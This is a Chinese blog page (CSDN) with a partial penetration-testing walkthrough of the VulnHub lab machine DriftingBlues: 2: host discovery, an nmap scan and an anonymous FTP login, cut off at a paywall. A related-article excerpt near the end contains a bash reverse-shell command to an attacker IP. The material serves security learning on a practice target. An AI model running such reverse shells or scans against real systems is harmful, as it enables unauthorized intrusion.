vulnhub靶机DriftingBlues: 2渗透笔记

最新推荐文章于 2024-05-12 22:19:41 发布
最新推荐文章于 2024-05-12 22:19:41 发布
阅读量862 收藏 4
点赞数 3
分类专栏: 靶机 学习 文章标签: 安全 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liver100day/article/details/119060769
版权

文章目录

环境准备

靶机环境搭建
攻击渗透机: kali IP地址:192.168.33.128
靶机:DriftingBlues: 2 IP地址未知
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/

1. 信息收集

1.1 主机发现

使用arp-scan -l获取目标靶机IP地址

arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)

在这里插入图片描述
扫描获取到目标靶机IP地址为:192.168.33.140

1.2 端口扫描

知道了目标靶机的IP地址,接下来我们使用nmap扫描下目标靶机开启了那些端口,服务,以及对应版本

nmap -T4 -sV -A -O -p- 192.168.33.140
-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p-(全部端口)

在这里插入图片描述
扫描得到,目标靶机开放了21端口(ftp服务),22端口(ssh服务),80端口(http服务)

1.3 访问80端口(http服务)

目标开启了80端口(http服务),那我们就去访问一下看看吧
在这里插入图片描述
结果并未发现什么有用信息,查看一下网页代码看看
在这里插入图片描述
没有什么其他信息,但我们通过火狐插件Wappalyzer获取到了目标网站一些信息
在这里插入图片描述

2.漏洞利用

2.1 ftp匿名登录漏洞

目标靶机开放了21端口(ftp服务),但这个端口和服务是存在匿名登录漏洞的,如果目标并未升级补丁的话,那我们即可利用此漏洞进行攻击
ftp
open 192.168.33.140
anonymous
在这里插入图片描述
密码不用输入 直接回车即可,确实存在匿名登录漏洞,我们成功的登录上了目标ftp,ls查看有无文件,发现有一个图片文件 secret.jpg

最低0.47元/天 解锁文章
liver100day
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub--driftingblues:2
venu_s的博客
06-03 395
靶机介绍 difficult:easy goal:get flags download:https://download.vulnhub.com/driftingblues/driftingblues2.ova 信息探测 主机发现 端口扫描 目标主机开放了21端口,有一张图片,可以匿名登陆;此外还开放了22端口和80端口 访问ftp,下载图片,图片不知道有啥用,先放着 80端口目录扫描 可以看出目标主机使用了WordPress,访问80端口 查看源码,就是一张图片 访问/blog,发现是一些博客
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-2
Aluxian_的博客
06-15 1540
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 下载好了把安装包解压 然后试用VMware即可。前言:这里扫不到靶机 解决方法:在开机时按下键进入界面*按e 键,进入该界面
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_[vulnhub靶机] driftingblues 3
最新发布
2401_84715513的博客
05-12 396
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。
VulnHub-driftingblues2
sanqin_的博客
07-04 465
靶机 DHCP 未能正确分配 IP :看这里 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 21端口开放ftp,22端口开发ssh,80端口开放http 访问网页无内容,只有图片 匿名用户访问ftp ftp ftp open ip #访问目标 ls 查看当前目录 get fileName #下载文件 exit #退出 查看图片,挺迷惑的,也没看见隐写啥的 binwalk imgName
靶机渗透练习02-driftingblues2
Force~
03-25 1977
靶机地址: https://www.vulnhub.com/entry/driftingblues-2,634/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) masscan 192.168.184.0/24 -p 80,22 netdiscover -i eth0 -r 192.168.184.0/24 2、端口扫描 nmap -A -sV -T4 -p- 靶机ip 得到如下信息 21—ftp—ProFTPD–同时还有 anonymous 匿名登录 22—ssh—Open.
vuln靶机--driftingblues2
bobo_milk的博客
05-15 287
目录 一、信息收集 二、漏洞发现 三、漏洞利用 四、权限提升 总结 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 nmap -A -v -T4 -p 1-65535 192.168.216.148 二、漏洞发现 先来看看21端口,支持匿名登录,因此我们上去看看有什么资料可以下载下来进行分析 ftp 192.168.216.148 帐号:ano...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
靶机19 driftingblues2
honest_gg的博客
10-31 964
获取标志 难度:简单
Driftingblues靶机01
qq_37301470的博客
06-01 261
基于kali的渗透 vlunhub靶机
driftingblues靶机(0ok编码)
m0_66299232的博客
12-12 589
2.一顿命令探测没有可利用的,我直接上传了一个linpeas.sh(github里有)脚本,给他可执行权限就可以运行。2.echo 'L25vdGVmb3JraW5nZmlzaC50eHQ=' -n | base64 -d //解码。bash -i >& /dev/tcp/192.168.1.105/4444 0>&1 //反弹shell。/bin/bash' > emergency //要执行bash命令。5.把域名添加到/etc/hosts 下 再用source刷新。4.再次查看源码,发现一个用户名。
Hackmyvm综合靶机 | Driftingblues-1
IerkeU的博客
04-01 3146
前提概要 靶场地址:https://www.vulnhub.com/entry/driftingblues-1,625/,是一个极其简单的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / nmap下的工具) 二珂说:这个靶机系列是跟着新仔一起入坑的,他太卷了,咱们也不能速度太慢了!!!后面还会再次复习DC靶机的实现过程… 信息收集 arp-scan 192.168.132.0/24 之前都是扫出目标后就之间nmap一把梭 后面了解到这样容易暴露目标 所以
Vulnhub —— DriftingBlues系列
7ruth0hn的博客
11-27 546
文章目录写在前面思路DriftingBlues: 11.nmap扫描Tip:若靶机无法获取IP:2.漏洞探测与利用3.提权DriftingBlues: 2结语参考资料 写在前面 取证学习告一段落了,虽然个人赛失手了,但团体赛一等奖还是可以接受的。开始拖了很久的渗透学习 渗透工具: Nmap v7.91、gobuster、DIRB v2.22、crunch version 3.6、Hydra v9.1、pspy - version: v1.2.0 思路 DriftingBlues: 1 在官网下载ova文件
靶机渗透练习01-driftingblues
hirak0的博客
04-13 1265
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-1,625/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshoo
driftingblues2靶机实验实战演练
lianliandad的博客
02-02 403
好好学习天天向上
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值